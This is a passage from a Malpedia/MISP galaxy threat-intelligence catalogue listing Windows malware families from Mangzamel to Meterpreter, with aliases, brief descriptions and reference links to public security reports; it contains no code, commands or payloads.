https://malpedia.caad.fkie.fraunhofer.de/details/win.manamecrypt
https://www.bleepingcomputer.com/news/security/cryptohost-decrypted-locks-files-in-a-password-protected-rar-file/
https://www.gdatasoftware.com/blog/2016/04/28234-manamecrypt-a-ransomware-that-takes-a-different-route

Mangzamel

The tag is: misp-galaxy:malpedia="Mangzamel"

Mangzamel is also known as:

junidor
mengkite
vedratve

Table 2164. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.mangzamel
https://www.hybrid-analysis.com/sample/5d631d77401615d53f3ce3dbc2bfee5d934602dc35d488aa7cebf9b3ff1c4816?environmentId=2
https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2018GlobalThreatReport.pdf

Manifestus

The tag is: misp-galaxy:malpedia="Manifestus"

Manifestus is also known as:

Table 2165. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.manifestus_ransomware
https://twitter.com/struppigel/status/811587154983981056

ManItsMe

The tag is: misp-galaxy:malpedia="ManItsMe"

ManItsMe is also known as:

Table 2166. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.manitsme
https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf

Maoloa

Ransomware family closely related to GlobeImposter, notable for its use of SHACAL-2 encryption algorithm.

The tag is: misp-galaxy:malpedia="Maoloa"

Maoloa is also known as:

Table 2167. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.maoloa
https://id-ransomware.blogspot.com/2019/02/maoloa-ransomware.html

MAPIget

The tag is: misp-galaxy:malpedia="MAPIget"

MAPIget is also known as:

Table 2168. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.mapiget
https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf

Marap

Marap is a downloader, named after its command and control (C&C) phone home parameter "param" spelled backwards. It is written in C and contains a few notable anti-analysis features.

The tag is: misp-galaxy:malpedia="Marap"

Marap is also known as:

Table 2169. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.marap
https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-009.pdf
https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-006.pdf
https://www.proofpoint.com/us/threat-insight/post/new-modular-downloaders-fingerprint-systems-prepare-more-part-1-marap

Mariposa

The tag is: misp-galaxy:malpedia="Mariposa"

Mariposa is also known as:

Autorun
Palevo
Rimecud

Table 2170. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.mariposa
https://krebsonsecurity.com/2019/10/mariposa-botnet-author-darkcode-crime-forum-admin-arrested-in-germany/
https://www.us-cert.gov/ics/advisories/ICSA-10-090-01
https://defintel.com/docs/Mariposa_Analysis.pdf

MarkiRAT

The tag is: misp-galaxy:malpedia="MarkiRAT"

MarkiRAT is also known as:

Table 2171. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.markirat
https://securelist.com/ferocious-kitten-6-years-of-covert-surveillance-in-iran/102806/

Masad Stealer

The tag is: misp-galaxy:malpedia="Masad Stealer"

Masad Stealer is also known as:

Table 2172. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.masad_stealer
https://blogs.juniper.net/en-us/threat-research/masad-stealer-exfiltrating-using-telegram

MASS Logger

MassLogger is a .NET credential stealer. It starts with a launcher that uses simple anti-debugging techniques which can be easily bypassed when identified. This first stage loader eventually XOR-decrypts the second stage assembly which then decrypts, loads and executes the final MassLogger payload.

The tag is: misp-galaxy:malpedia="MASS Logger"

MASS Logger is also known as:

Table 2173. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.masslogger
https://fr3d.hk/blog/masslogger-frankenstein-s-creation
https://medium.com/@mariohenkel/decrypt-masslogger-2-4-0-0-configuration-eff3ee0720a7
https://blog.talosintelligence.com/2021/02/masslogger-cred-exfil.html
https://blog.talosintelligence.com/2021/04/a-year-of-fajan-evolution-and-bloomberg.html
https://decoded.avast.io/anhho/masslogger-v3-a-net-stealer-with-serious-obfuscation/
https://maxkersten.nl/binary-analysis-course/malware-analysis/rezer0v4-loader/
https://www.gdatasoftware.com/blog/2020/06/36129-harmful-logging-diving-into-masslogger
https://www.seqrite.com/blog/masslogger-an-emerging-spyware-and-keylogger/
https://www.fireeye.com/blog/threat-research/2020/08/bypassing-masslogger-anti-analysis-man-in-the-middle-approach.html
https://twitter.com/pancak3lullz/status/1255893734241304576

Matanbuchus

The tag is: misp-galaxy:malpedia="Matanbuchus"

Matanbuchus is also known as:

Table 2174. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.matanbuchus
https://unit42.paloaltonetworks.com/matanbuchus-malware-as-a-service/

Matrix Banker

The tag is: misp-galaxy:malpedia="Matrix Banker"

Matrix Banker is also known as:

Table 2175. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.matrix_banker
https://www.arbornetworks.com/blog/asert/another-banker-enters-matrix/

Matrix Ransom

The tag is: misp-galaxy:malpedia="Matrix Ransom"

Matrix Ransom is also known as:

Table 2176. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.matrix_ransom
https://unit42.paloaltonetworks.com/matrix-ransomware/
https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_1_tamada-yamazaki-nakatsuru_en.pdf
https://blogs.blackberry.com/en/2018/11/threat-spotlight-inside-vssdestroy-ransomware
https://www.blackhoodie.re/assets/archive/Matrix_Ransomware_blackhoodie.pdf

Matryoshka RAT

The tag is: misp-galaxy:malpedia="Matryoshka RAT"

Matryoshka RAT is also known as:

Table 2177. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.matryoshka_rat
http://www.clearskysec.com/tulip/
https://www.clearskysec.com/wp-content/uploads/2017/07/Operation_Wilted_Tulip.pdf

Matsnu

The tag is: misp-galaxy:malpedia="Matsnu"

Matsnu is also known as:

Table 2178. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.matsnu
https://blog.checkpoint.com/wp-content/uploads/2015/07/matsnu-malwareid-technical-brief.pdf

Maudi

Specialized PoisonIvy Sideloader.

The tag is: misp-galaxy:malpedia="Maudi"

Maudi is also known as:

Table 2179. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.maudi
https://paper.seebug.org/papers/APT/APT_CyberCriminal_Campagin/2012/NormanShark-MaudiOperation.pdf
https://contagiodump.blogspot.com/2010/06/may-28-cve-2009-3129-xls-for-office.html

Maxtrilha

Banking trojan written in Delphi, targeting customers of European and South American banks.

The tag is: misp-galaxy:malpedia="Maxtrilha"

Maxtrilha is also known as:

Table 2180. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.maxtrilha
https://seguranca-informatica.pt/the-new-maxtrilha-trojan-is-being-disseminated-and-targeting-several-banks/.YT3_VfwzaKN[https://seguranca-informatica.pt/the-new-maxtrilha-trojan-is-being-disseminated-and-targeting-several-banks/.YT3_VfwzaKN]

Maze

Maze Ransomware encrypts files and makes them inaccessible while adding a custom extension containing part of the ID of the victim. The ransom note is placed inside a text file and an htm file. There are a few different extensions appended to files which are randomly generated.

Actors are known to exfiltrate the data from the network for further extortion. It spreads mainly using email spam and various exploit kits (Spelevo, Fallout).

The code of Maze ransomware is highly complicated and obfuscated, which helps to evade security solutions using signature-based detections.

The tag is: misp-galaxy:malpedia="Maze"

Maze is also known as:

ChaCha

Table 2181. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.maze
https://www.bleepingcomputer.com/news/security/data-leak-marketplaces-aim-to-take-over-the-extortion-economy/
https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf
https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf
https://www.docdroid.net/dUpPY5s/maze.pdf
https://blog.redteam.pl/2020/05/sodinokibi-revil-ransomware.html
https://www.zdnet.com/article/ransomware-gang-publishes-tens-of-gbs-of-internal-data-from-lg-and-xerox/
https://www.cert.ssi.gouv.fr/cti/CERTFR-2021-CTI-007/
https://www.cyborgsecurity.com/cyborg_labs/hunting-ransomware-inhibiting-system-backup-or-recovery/
https://news.sophos.com/en-us/2020/09/17/maze-attackers-adopt-ragnar-locker-virtual-machine-technique/
https://cti-league.com/wp-content/uploads/2021/02/CTI-League-Darknet-Report-2021.pdf
https://news.sophos.com/en-us/2020/12/08/egregor-ransomware-mazes-heir-apparent/
https://labs.sentinelone.com/enter-the-maze-demystifying-an-affiliate-involved-in-maze-snow/
https://www.blueliv.com/cyber-security-and-cyber-threat-intelligence-blog-blueliv/escape-from-the-maze/
https://www.fireeye.com/blog/threat-research/2020/07/financially-motivated-actors-are-expanding-access-into-ot.html
https://public.intel471.com/blog/ransomware-as-a-service-2020-ryuk-maze-revil-egregor-doppelpaymer/
https://blog.talosintelligence.com/2019/12/IR-Lessons-Maze.html
https://www.zataz.com/cyber-attaque-a-lencontre-des-serveurs-de-bouygues-construction/
https://therecord.media/darkside-gang-estimated-to-have-made-over-90-million-from-ransomware-attacks/
https://download.bitdefender.com/resources/files/News/CaseStudies/study/318/Bitdefender-TRR-Whitepaper-Maze-creat4351-en-EN-GenericUse.pdf
https://www.cityofpensacola.com/DocumentCenter/View/18879/Deloitte-Executive-Summary-PDF
https://www.microsoft.com/security/blog/2020/04/28/ransomware-groups-continue-to-target-healthcare-critical-services-heres-how-to-reduce-risk/
https://securelist.com/targeted-ransomware-encrypting-data/99255/
https://us-cert.cisa.gov/ncas/alerts/aa20-345a
https://www.bleepingcomputer.com/news/security/maze-ransomware-is-shutting-down-its-cybercrime-operation/
https://github.com/albertzsigovits/malware-notes/blob/master/Maze.md
https://www.bleepingcomputer.com/news/security/three-more-ransomware-families-create-sites-to-leak-stolen-data/
https://sites.temple.edu/care/ci-rw-attacks/
https://www.secureworks.com/research/threat-profiles/gold-village
https://www.proofpoint.com/us/blog/threat-insight/first-step-initial-access-leads-ransomware
https://blog.sensecy.com/2020/08/20/global-ransomware-attacks-in-2020-the-top-4-vulnerabilities/
https://krebsonsecurity.com/2021/08/ransomware-gangs-and-the-name-game-distraction/
https://www.bleepingcomputer.com/news/security/maze-ransomware-behind-pensacola-cyberattack-1m-ransom-demand/
https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-2/
https://www.fireeye.com/blog/threat-research/2021/02/melting-unc2198-icedid-to-ransomware-operations.html
https://www.bleepingcomputer.com/news/security/ransomware-attackers-use-your-cloud-backups-against-you/
https://www.bleepingcomputer.com/news/security/chipmaker-maxlinear-reports-data-breach-after-maze-ransomware-attack/
https://www.mcafee.com/blogs/other-blogs/mcafee-labs/ransomware-maze/
https://www.bitdefender.com/files/News/CaseStudies/study/377/Bitdefender-Whitepaper-WMI-creat4871-en-EN-GenericUse.pdf
https://statescoop.com/baltimore-ransomware-crowdstrike-extortion/
https://twitter.com/certbund/status/1192756294307995655
https://s3.amazonaws.com/talos-intelligence-site/production/document_files/files/000/095/543/original/CTIR_casestudy_1.pdf
https://oag.ca.gov/system/files/Letter%204.pdf
https://blogs.quickheal.com/maze-ransomware-continues-threat-consumers/
https://analyst1.com/file-assets/RANSOM-MAFIA-ANALYSIS-OF-THE-WORLD%E2%80%99S-FIRST-RANSOMWARE-CARTEL.pdf
https://www.paloaltonetworks.com/content/dam/pan/en_US/assets/pdf/reports/Unit_42/unit42-ransomware-threat-report-2021.pdf
https://www.bleepingcomputer.com/news/security/crytek-confirms-egregor-ransomware-attack-customer-data-theft/
https://therecord.media/ransomwhere-project-wants-to-create-a-database-of-past-ransomware-payments/
https://www.bleepingcomputer.com/news/security/it-services-giant-cognizant-suffers-maze-ransomware-cyber-attack/
https://www.bleepingcomputer.com/news/security/darkside-ransomware-made-90-million-in-just-nine-months/
https://github.com/albertzsigovits/malware-notes/blob/master/Ransomware/Maze.md
https://techcrunch.com/2020/03/26/chubb-insurance-breach-ransomware/
https://blog.chainalysis.com/reports/ransomware-connections-maze-egregor-suncrypt-doppelpaymer
https://www.crowdstrike.com/blog/maze-ransomware-deobfuscation/
https://research.checkpoint.com/2020/graphology-of-an-exploit-playbit/
https://krebsonsecurity.com/2019/12/ransomware-gangs-now-outing-victim-businesses-that-dont-pay-up/
https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf
https://blog.minerva-labs.com/egregor-ransomware-an-in-depth-analysis
https://www.fireeye.com/blog/threat-research/2020/05/tactics-techniques-procedures-associated-with-maze-ransomware-incidents.html
https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/wp-spark-state-of-ransomware.pdf
https://ke-la.com/zooming-into-darknet-threats-targeting-jp-orgs-kela/
https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-001.pdf
https://www.bleepingcomputer.com/news/security/maze-ransomware-now-delivered-by-spelevo-exploit-kit/
https://killbit.medium.com/applying-the-diamond-model-to-cognizant-msp-and-maze-ransomware-and-a-policy-assessment-498f01bd723f
https://www.domaintools.com/resources/blog/the-most-prolific-ransomware-families-a-defenders-guide
https://www.hornetsecurity.com/en/security-informationen-en/leakware-ransomware-hybrid-attacks/
https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf
https://nakedsecurity.sophos.com/2020/06/04/nuclear-missile-contractor-hacked-in-maze-ransomware-attack/
https://adversary.crowdstrike.com/adversary/twisted-spider/
https://web.archive.org/web/20210305181115/https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf
https://web.archive.org/save/https://news.cognizant.com/2020-04-18-cognizant-security-update
https://www.mcafee.com/blogs/other-blogs/mcafee-labs/csi-evidence-indicators-for-targeted-ransomware-attacks-part-ii/
https://www.accenture.com/us-en/blogs/cyber-defense/evolving-danger-ransomware-extortion
https://www.bleepingcomputer.com/news/security/maze-ransomware-releases-files-stolen-from-city-of-pensacola/
https://media-exp1.licdn.com/dms/document/C4E1FAQHyhJYCWxq5eg/feedshare-document-pdf-analyzed/0?e=1584129600&v=beta&t=9wTDR-mZPDF4ET7ABNgE2ab9g8e9wxQrhXsxI1cSX8U
https://blog.talosintelligence.com/2020/12/quarterly-ir-report-fall-2020-q4.html
https://ke-la.com/how-ransomware-gangs-find-new-monetization-schemes-and-evolve-in-marketing/
https://labs.sentinelone.com/case-study-catching-a-human-operated-maze-ransomware-attack-in-action/
https://blog.talosintelligence.com/2020/09/CTIR-quarterly-trends-Q4-2020.html
https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-1
https://ke-la.com/to-attack-or-not-to-attack-targeting-the-healthcare-sector-in-the-underground-ecosystem/
https://www.proofpoint.com/us/threat-insight/post/ta2101-plays-government-imposter-distribute-malware-german-italian-and-us
https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf
https://www.bleepingcomputer.com/news/security/allied-universal-breached-by-maze-ransomware-stolen-data-leaked/
https://securelist.com/maze-ransomware/99137/
https://www.bleepingcomputer.com/news/security/maze-ransomware-now-encrypts-via-virtual-machines-to-evade-detection/
https://www.telsy.com/wp-content/uploads/Maze_Vaccine.pdf
https://analyst1.com/blog/ransom-mafia-analysis-of-the-worlds-first-ransomware-cartel
https://www.brighttalk.com/webcast/7451/408167/navigating-maze-analysis-of-a-rising-ransomware-threat
https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-1/
http://www.secureworks.com/research/threat-profiles/gold-village
https://download.microsoft.com/download/f/8/1/f816b8b6-bee3-41e5-b6cc-e925a5688f61/Microsoft_Digital_Defense_Report_2020_September.pdf
https://id-ransomware.blogspot.com/2019/05/chacha-ransomware.html
https://www.trendmicro.com/en_us/research/20/l/the-impact-of-modern-ransomware-on-manufacturing-networks.html
https://docs.google.com/spreadsheets/d/1MI8Z2tBhmqQ5X8Wf_ozv3dVjz5sJOs-3
https://www.crowdstrike.com/blog/ransomware-preparedness-a-call-to-action/

MBRlock

This ransomware modifies the master boot record of the victim's computer so that it shows a ransom note before Windows starts.

The tag is: misp-galaxy:malpedia="MBRlock"

MBRlock is also known as:

DexLocker

Table 2182. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.mbrlock
http://id-ransomware.blogspot.com.tr/2018/02/mbrlock-hax-ransomware.html
https://www.bleepingcomputer.com/news/security/dexcrypt-mbrlocker-demands-30-yuan-to-gain-access-to-computer/
https://www.hybrid-analysis.com/sample/dfc56a704b5e031f3b0d2d0ea1d06f9157758ad950483b44ac4b77d33293cb38?environmentId=100
https://app.any.run/tasks/0a7e643f-7562-4575-b8a5-747bd6b5f02d

MBR Locker

The tag is: misp-galaxy:malpedia="MBR Locker"

MBR Locker is also known as:

Table 2183. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.mbrlocker
https://dissectingmalwa.re/the-blame-game-about-false-flags-and-overwritten-mbrs.html

Mebromi

The tag is: misp-galaxy:malpedia="Mebromi"

Mebromi is also known as:

MyBios

Table 2184. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.mebromi
https://www.symantec.com/connect/blogs/bios-threat-showing-again
https://www.webroot.com//blog/2011/09/13/mebromi-the-first-bios-rootkit-in-the-wild/
http://contagiodump.blogspot.com/2011/09/mebromi-bios-rootkit-affecting-award.html
http://www.theregister.co.uk/2011/09/14/bios_rootkit_discovered/

MECHANICAL

The tag is: misp-galaxy:malpedia="MECHANICAL"

MECHANICAL is also known as:

GoldStamp

Table 2185. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.mechanical
https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf
https://asert.arbornetworks.com/stolen-pencil-campaign-targets-academia/

Medre

The tag is: misp-galaxy:malpedia="Medre"

Medre is also known as:

Table 2186. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.medre
http://contagiodump.blogspot.com/2012/06/medrea-autocad-worm-samples.html

Medusa (Windows)

Medusa is a DDoS bot written in .NET 2.0. In its current incarnation its C&C protocol is based on HTTP, while its predecessor made use of IRC.

The tag is: misp-galaxy:malpedia="Medusa (Windows)"

Medusa (Windows) is also known as:

Table 2187. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.medusa
https://web.archive.org/web/20200509171721/https://raw.githubusercontent.com/fdiskyou/threat-INTel/master/2015/GlobalThreatIntelReport.pdf
https://www.arbornetworks.com/blog/asert/medusahttp-ddos-slithers-back-spotlight/
https://zerophagemalware.com/2017/10/13/rig-ek-via-malvertising-drops-a-miner/
https://news.drweb.com/show/?i=10302&lng=en

MedusaLocker

A Windows ransomware that will run certain tasks to prepare the target system for the encryption of files. MedusaLocker avoids executable files, probably to avoid rendering the targeted system unusable for paying the ransom. It uses a combination of AES and RSA-2048, and reportedly appends extensions such as .encrypted, .bomber, .boroff, .breakingbad, .locker16, .newlock, .nlocker, and .skynet.

The tag is: misp-galaxy:malpedia="MedusaLocker"

MedusaLocker is also known as:

AKO Doxware
AKO Ransomware
MedusaReborn

Table 2188. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.medusalocker
http://id-ransomware.blogspot.com/2019/10/medusalocker-ransomware.html
https://blog.talosintelligence.com/2020/04/medusalocker.html
https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-1
https://twitter.com/siri_urz/status/1215194488714346496?s=20
https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_1_tamada-yamazaki-nakatsuru_en.pdf
https://www.carbonblack.com/2020/06/03/tau-threat-analyis-medusa-locker-ransomware/
https://www.microsoft.com/security/blog/2020/04/28/ransomware-groups-continue-to-target-healthcare-critical-services-heres-how-to-reduce-risk/
https://dissectingmalwa.re/try-not-to-stare-medusalocker-at-a-glance.html
https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf
https://docs.google.com/spreadsheets/d/1MI8Z2tBhmqQ5X8Wf_ozv3dVjz5sJOs-3
https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/wp-spark-state-of-ransomware.pdf
https://us-cert.cisa.gov/ncas/alerts/aa20-345a
https://id-ransomware.blogspot.com/2020/01/ako-ransomware.html
https://ke-la.com/how-ransomware-gangs-find-new-monetization-schemes-and-evolve-in-marketing/
https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-1/
https://www.cybereason.com/blog/medusalocker-ransomware
https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-2/

MegaCortex

Megacortex is a ransomware used in targeted attacks against corporations. Once the ransomware is run it tries to stop security related services and after that it starts its own encryption process adding a .aes128ctr or .megac0rtx extension to the encrypted files. It is used to be carried from downloaders and trojans, it has no own propagation capabilities.

The tag is: misp-galaxy:malpedia="MegaCortex"

MegaCortex is also known as:

Table 2189. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.megacortex
https://www.zdnet.com/article/the-malware-that-usually-installs-ransomware-and-you-need-to-remove-right-away/
https://www.trendmicro.com/vinfo/pl/security/news/cybercrime-and-digital-threats/megacortex-ransomware-spotted-attacking-enterprise-networks
https://blog.malwarebytes.com/detections/ransom-megacortex/
https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware
https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-001.pdf
https://www.fireeye.com/blog/threat-research/2020/07/financially-motivated-actors-are-expanding-access-into-ot.html
https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/incident-response-polar-ransomware-apt27/
https://www.bleepingcomputer.com/news/security/elusive-megacortex-ransomware-found-here-is-what-we-know/
https://news.sophos.com/en-us/2019/05/03/megacortex-ransomware-wants-to-be-the-one/
https://www.bleepingcomputer.com/news/security/fbi-issues-alert-for-lockergoga-and-megacortex-ransomware/
https://threatpost.com/megacortex-ransomware-mass-distribution/146933/
https://www.mcafee.com/blogs/other-blogs/mcafee-labs/csi-evidence-indicators-for-targeted-ransomware-attacks-part-ii/
https://www.bleepingcomputer.com/news/security/new-megacortex-ransomware-changes-windows-passwords-threatens-to-publish-data/
https://www.computing.co.uk/ctg/news/3084818/warning-over-lockergoga-and-megacortex-ransomware-attacks-targeting-private-industry-in-western-countries
https://www.microsoft.com/security/blog/2020/03/05/human-operated-ransomware-attacks-a-preventable-disaster/

MeguminTrojan

Megumin Trojan, is a malware focused on multiple fields (DDoS, Miner, Loader, Clipper).

The tag is: misp-galaxy:malpedia="MeguminTrojan"

MeguminTrojan is also known as:

Table 2190. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.megumin
https://fumik0.com/2019/05/03/lets-nuke-megumin-trojan/

Mekotio

The tag is: misp-galaxy:malpedia="Mekotio"

Mekotio is also known as:

Table 2191. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.mekotio
https://www.welivesecurity.com/2020/08/13/mekotio-these-arent-the-security-updates-youre-looking-for/
http://www.interior.gob.es/prensa/noticias/-/asset_publisher/GHU8Ap6ztgsg/content/id/13552853
https://www.blueliv.com/cyber-security-and-cyber-threat-intelligence-blog-blueliv/rooty-dolphin-uses-mekotio-to-target-bank-clients-in-south-america-and-europe/
https://therecord.media/spain-arrests-16-for-distributing-the-mekotio-and-grandoreiro-banking-trojans/

Melcoz

The tag is: misp-galaxy:malpedia="Melcoz"

Melcoz is also known as:

Table 2192. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.melcoz
https://securelist.com/the-tetrade-brazilian-banking-malware/97779/

Merlin

Merlin is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in golang.

The tag is: misp-galaxy:malpedia="Merlin"

Merlin is also known as:

Table 2193. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.merlin
http://lockboxx.blogspot.com/2018/02/intro-to-using-gscript-for-red-teams.html
http://lockboxx.blogspot.com/2018/02/merlin-for-red-teams.html
https://github.com/Ne0nd0g/merlin

Mespinoza

Mespinosa is a ransomware which encrypts file using an asymmetric encryption and adds .pysa as file extension. According to dissectingmalware the extension "pysa" is probably derived from the Zanzibari Coin with the same name.

The tag is: misp-galaxy:malpedia="Mespinoza"

Mespinoza is also known as:

pysa

Table 2194. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.mespinoza
https://blogs.blackberry.com/en/2021/06/pysa-loves-chachi-a-new-golang-rat
https://www.ic3.gov/Media/News/2021/210316.pdf
https://thedfirreport.com/2020/11/23/pysa-mespinoza-ransomware/
https://www.cybereason.com/blog/threat-analysis-report-inside-the-destructive-pysa-ransomware
https://www.hornetsecurity.com/en/security-informationen-en/leakware-ransomware-hybrid-attacks/
http://www.secureworks.com/research/threat-profiles/gold-burlap
https://www.zdnet.com/article/france-warns-of-new-ransomware-gang-targeting-local-governments/
https://id-ransomware.blogspot.com/2019/10/mespinoza-ransomware.html
https://dissectingmalwa.re/another-one-for-the-collection-mespinoza-pysa-ransomware.html
https://www.cyborgsecurity.com/cyborg_labs/hunting-ransomware-inhibiting-system-backup-or-recovery/
https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf
https://public.intel471.com/blog/ransomware-as-a-service-2020-ryuk-maze-revil-egregor-doppelpaymer/
https://docs.google.com/spreadsheets/d/1MI8Z2tBhmqQ5X8Wf_ozv3dVjz5sJOs-3
https://www.cert.ssi.gouv.fr/cti/CERTFR-2020-CTI-002/
https://vulnerability.ch/2021/04/ransomware-and-date-leak-site-publication-time-analysis/
https://www.lacework.com/blog/pysa-ransomware-gang-adds-linux-support/
https://twitter.com/campuscodi/status/1347223969984897026
https://unit42.paloaltonetworks.com/gasket-and-magicsocks-tools-install-mespinoza-ransomware/
https://ke-la.com/how-ransomware-gangs-find-new-monetization-schemes-and-evolve-in-marketing/

MetadataBin

Ransomware.

The tag is: misp-galaxy:malpedia="MetadataBin"

MetadataBin is also known as:

Ransomware32

Table 2195. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.metadatabin
https://id-ransomware.blogspot.com/2020/10/metadata-bin-ransomware.html

METALJACK

The tag is: misp-galaxy:malpedia="METALJACK"

METALJACK is also known as:

denesRAT

Table 2196. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.metaljack
https://go.recordedfuture.com/hubfs/reports/cta-2020-1110.pdf
https://ti.qianxin.com/blog/articles/coronavirus-analysis-of-global-outbreak-related-cyber-attacks/
https://s.tencent.com/research/report/944.html
https://www.secrss.com/articles/17900
https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf
https://www.fireeye.com/blog/threat-research/2020/04/apt32-targeting-chinese-government-in-covid-19-related-espionage.html
https://m.threatbook.cn/detail/2527
https://www.youtube.com/watch?v=ftjDH65kw6E
https://blog.viettelcybersecurity.com/apt32-deobfuscation-arsenal-deobfuscating-mot-vai-loai-obfucation-toolkit-cua-apt32-phan-1/

Metamorfo

The tag is: misp-galaxy:malpedia="Metamorfo"

Metamorfo is also known as:

Casbaneiro

Table 2197. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.metamorfo
https://umbrella.cisco.com/blog/navigating-cybersecurity-during-a-pandemic-latest-malware-and-threat-actors
https://www.bitdefender.com/files/News/CaseStudies/study/333/Bitdefender-PR-Whitepaper-Metamorfo-creat4500-en-EN-GenericUse.pdf
https://github.com/jeFF0Falltrades/IoCs/blob/master/Broadbased/metamorfo.md
https://blog.ensilo.com/metamorfo-avast-abuser
https://www.botconf.eu/wp-content/uploads/2019/12/B2019-Soucek-Hornak-DemystifyingBankingTrojansFromLatinAmerica.pdf
https://cofense.com/blog/autohotkey-banking-trojan/
https://blog.talosintelligence.com/2018/11/metamorfo-brazilian-campaigns.html
https://twitter.com/MsftSecIntel/status/1418706916922986504
https://www.fireeye.com/blog/threat-research/2018/04/metamorfo-campaign-targeting-brazilian-users.html
https://medium.com/@chenerlich/the-avast-abuser-metamorfo-banking-malware-hides-by-abusing-avast-executable-ac9b8b392767

Meteor

A wiper used in an attack against the Iranian train system.

The tag is: misp-galaxy:malpedia="Meteor"

Meteor is also known as:

Table 2198. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.meteor
https://labs.sentinelone.com/meteorexpress-mysterious-wiper-paralyzes-iranian-trains-with-epic-troll/
https://threatpost.com/novel-meteor-wiper-used-in-attack-that-crippled-iranian-train-system/168262/
https://research.checkpoint.com/2021/indra-hackers-behind-recent-attacks-on-iran/

Meterpreter (Windows)

The tag is: misp-galaxy:malpedia="Meterpreter (Windows)"

Meterpreter (Windows) is also known as:

Table 2199. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.meterpreter
https://asec.ahnlab.com/ko/26705/
https://github.com/StrangerealIntel/CyberThreatIntel/blob/master/China/APT/Chimera/Analysis.md
https://vx-underground.org/archive/APTs/2017/2017.12.11/Money%20Taker.pdf
https://us-cert.cisa.gov/ncas/analysis-reports/ar20-268a
https://news.sophos.com/en-us/2021/06/02/amsi-bypasses-remain-tricks-of-the-malware-trade/
https://www.recordedfuture.com/chinese-group-calypso-exploiting-microsoft-exchange/
https://blog.lumen.com/no-longer-just-theory-black-lotus-labs-uncovers-linux-executables-deployed-as-stealth-windows-loaders/
https://cybleinc.com/2020/11/17/oceanlotus-continues-with-its-cyber-espionage-operations/
https://redcanary.com/blog/getsystem-offsec/
https://www.fintechsecurity.com.hk/slides/01.Dmitry-Annual-Group-IB-report-High-Tech-Crime-Trends.pdf
https://www.wired.com/story/russias-fancy-bear-hack-us-federal-agency/
https://go.recordedfuture.com/hubfs/reports/cta-2021-0107.pdf
